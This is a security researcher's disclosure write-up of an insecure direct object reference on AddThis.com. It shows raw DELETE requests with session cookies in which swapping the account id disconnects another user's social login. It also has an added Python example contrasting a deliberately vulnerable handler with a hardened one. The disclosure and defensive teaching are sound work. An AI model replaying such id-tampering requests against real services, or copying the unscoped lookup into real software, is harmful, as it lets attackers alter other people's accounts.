First of all I want to introduce AddThis.com.
AddThis is a media web-tracking technology company based in Vienna, Virginia, United States. The company operates AddThis.com, a social bookmarking service that can be integrated into a website with the use of a web widget.
While testing addthis.com I found an IDOR (Insecure Direct Object Reference).
Via this IDOR I was able to disconnect any user's social login, like Facebook, Twitter or Gmail.
So let's start with how I found it.
When a user clicks on disconnect on any connected social login, the following request is made:
DELETE /darkseid/account/connected-accounts/2806924 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.addthis.com/dashboard
Cookie: uid=55d0eb989e2cee94; uvc=12%7C33%2C9%7C34%2C25%7C35%2C11%7C36%2C11%7C37; di2=NT6YRS.X7Y~X5L~W4O~S9E|KU.UYM; vc=3; loc=MDAwMDBBU0lOV0IyMDI2MjY4NDAwMDAwMDAwVg==; um=g.'27362734525410363693302804098779280801'|2JX!2TR-qys5R3883EzYYw6BIR; bt2=55d0ee88001E70001003y70001; ssc=facebook%3B1%2Cgoogle%3B1; km_ab_cbp=1; km_ai=55fb100042f038.14843744; PHPSESSID=ltvujq6sdr095r121229ah1pd2; siteaud=all%7C1442517586%3Bpub%7C1442519399%3Bregpub%7C1442519399; ana_svc=sk; _conv_v=vi:1442516999392-0.5064123653263851*sc:2*cs:1442519430*fs:1442516999*pv:4*ps:1442516999; __atuvc=3%7C37; __atuvs=55fb1007e0d70ac9002; __utma=56306477.1273717834.1442517001.1442517001.1442517001.1; __utmb=56306477.8.10.1442517001; __utmc=56306477; __utmz=56306477.1442517001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SERVERID=lpw000|VfsZk|VfsTE; aps=%7B%22stats%22%3A%2214days%22%2C%22date-from%22%3A%222015-09-03%22%2C%22date-to%22%3A%222015-09-16%22%2C%22_u%22%3A%22%22%7D; __utmt=1; _conv_s=si:2*pv:1
X-Zm-Ff: 1
Connection: keep-alive
To check the IDOR I then created another test account, which is associated with the id 2806929.
Now, from the account associated with the id 2806924, I requested another social login disconnect. The request was very similar to the above request; I just changed the id 2806924 to 2806929.
So here is the final request:
DELETE /darkseid/account/connected-accounts/2806929 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.addthis.com/dashboard
Cookie: uid=55d0eb989e2cee94; uvc=12%7C33%2C9%7C34%2C25%7C35%2C11%7C36%2C11%7C37; di2=NT6YRS.X7Y~X5L~W4O~S9E|KU.UYM; vc=3; loc=MDAwMDBBU0lOV0IyMDI2MjY4NDAwMDAwMDAwVg==; um=g.'27362734525410363693302804098779280801'|2JX!2TR-qys5R3883EzYYw6BIR; bt2=55d0ee88001E70001003y70001; ssc=facebook%3B1%2Cgoogle%3B1; km_ab_cbp=1; km_ai=55fb100042f038.14843744; PHPSESSID=ltvujq6sdr095r121229ah1pd2; siteaud=all%7C1442517586%3Bpub%7C1442519399%3Bregpub%7C1442519399; ana_svc=sk; _conv_v=vi:1442516999392-0.5064123653263851*sc:2*cs:1442519430*fs:1442516999*pv:4*ps:1442516999; __atuvc=3%7C37; __atuvs=55fb1007e0d70ac9002; __utma=56306477.1273717834.1442517001.1442517001.1442517001.1; __utmb=56306477.8.10.1442517001; __utmc=56306477; __utmz=56306477.1442517001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SERVERID=lpw000|VfsZk|VfsTE; aps=%7B%22stats%22%3A%2214days%22%2C%22date-from%22%3A%222015-09-03%22%2C%22date-to%22%3A%222015-09-16%22%2C%22_u%22%3A%22%22%7D; __utmt=1; _conv_s=si:2*pv:1
X-Zm-Ff: 1
Connection: keep-alive
Finally it gave a 200 OK response (sorry, I forgot to save the response),
and I checked that the social login associated with the id 2806929 had been disconnected.
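The root cause here is a handler that deletes whatever row the numeric id in the URL names, without asking whether that row belongs to the logged-in user. The following is an added illustration written for this page, not code from the original post or from AddThis: a minimal model of the connected-accounts DELETE endpoint with the vulnerable lookup beside a hardened one that scopes the lookup to the session's user and records refused attempts. The in-memory store, the user ids "uid-A"/"uid-B", and the function names are constructed assumptions; only the path shape and the two account ids come from the write-up.

```python
import re
from dataclasses import dataclass

# Path shape of the DELETE request shown in the write-up.
PATH_RE = re.compile(r"^/darkseid/account/connected-accounts/(\d+)$")


@dataclass
class ConnectedAccount:
    id: int
    owner_uid: str   # the dashboard user this social login belongs to (assumed field)
    provider: str    # "facebook", "google", ...


class HttpError(Exception):
    """Raised by a handler to signal a non-200 status."""
    def __init__(self, status):
        super().__init__(status)
        self.status = status


def parse_account_id(path):
    """Return the numeric id from the DELETE path, or 404 on any other path."""
    m = PATH_RE.match(path)
    if not m:
        raise HttpError(404)
    return int(m.group(1))


def make_store():
    """Constructed sample data: two users, one connected login each (ids from the post)."""
    return {
        2806924: ConnectedAccount(2806924, "uid-A", "facebook"),
        2806929: ConnectedAccount(2806929, "uid-B", "google"),
    }


def delete_vulnerable(store, session_uid, path):
    """The IDOR pattern: the row is looked up by the id in the URL alone.
    session_uid never enters the decision, so any logged-in user can
    remove any other user's connected login."""
    account_id = parse_account_id(path)
    if account_id not in store:
        raise HttpError(404)
    del store[account_id]
    return 200


def delete_hardened(store, session_uid, path, audit):
    """Fix: scope the lookup to the caller. An id that exists but belongs to
    someone else is answered exactly like a missing id (404), so the endpoint
    cannot be used to enumerate other users' ids, and the refused attempt is
    recorded so repeated cross-account deletes show up in monitoring."""
    account_id = parse_account_id(path)
    row = store.get(account_id)
    if row is None or row.owner_uid != session_uid:
        audit.append(f"denied uid={session_uid} delete id={account_id}")
        raise HttpError(404)
    del store[account_id]
    audit.append(f"ok uid={session_uid} deleted id={account_id} provider={row.provider}")
    return 200


def replay():
    """Replay the write-up's scenario against both handlers: uid-A (owner of
    2806924) sends the DELETE for uid-B's id 2806929."""
    path_other = "/darkseid/account/connected-accounts/2806929"
    result = {}

    store = make_store()
    result["vulnerable_status"] = delete_vulnerable(store, "uid-A", path_other)
    result["vulnerable_row_survived"] = 2806929 in store

    store = make_store()
    audit = []
    try:
        result["hardened_status"] = delete_hardened(store, "uid-A", path_other, audit)
    except HttpError as e:
        result["hardened_status"] = e.status
    result["hardened_row_survived"] = 2806929 in store

    # The real owner can still remove their own login through the hardened path.
    result["owner_status"] = delete_hardened(store, "uid-B", path_other, audit)
    result["audit"] = audit
    return result


if __name__ == "__main__":
    for key, value in replay().items():
        print(f"{key}: {value}")
```

Running the script replays the write-up: the vulnerable handler returns 200 and uid-B's row is gone, while the hardened handler answers 404, leaves the row in place, writes a "denied" audit line, and still lets uid-B delete their own login. The design point is that ownership is part of the lookup key, not a separate check bolted on afterwards, and that "not yours" and "does not exist" are indistinguishable to the caller.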
Timeline:
Bug Reported: 18/09/15
Validated: 19/09/15
Fixed: 1/11/2016
Thanks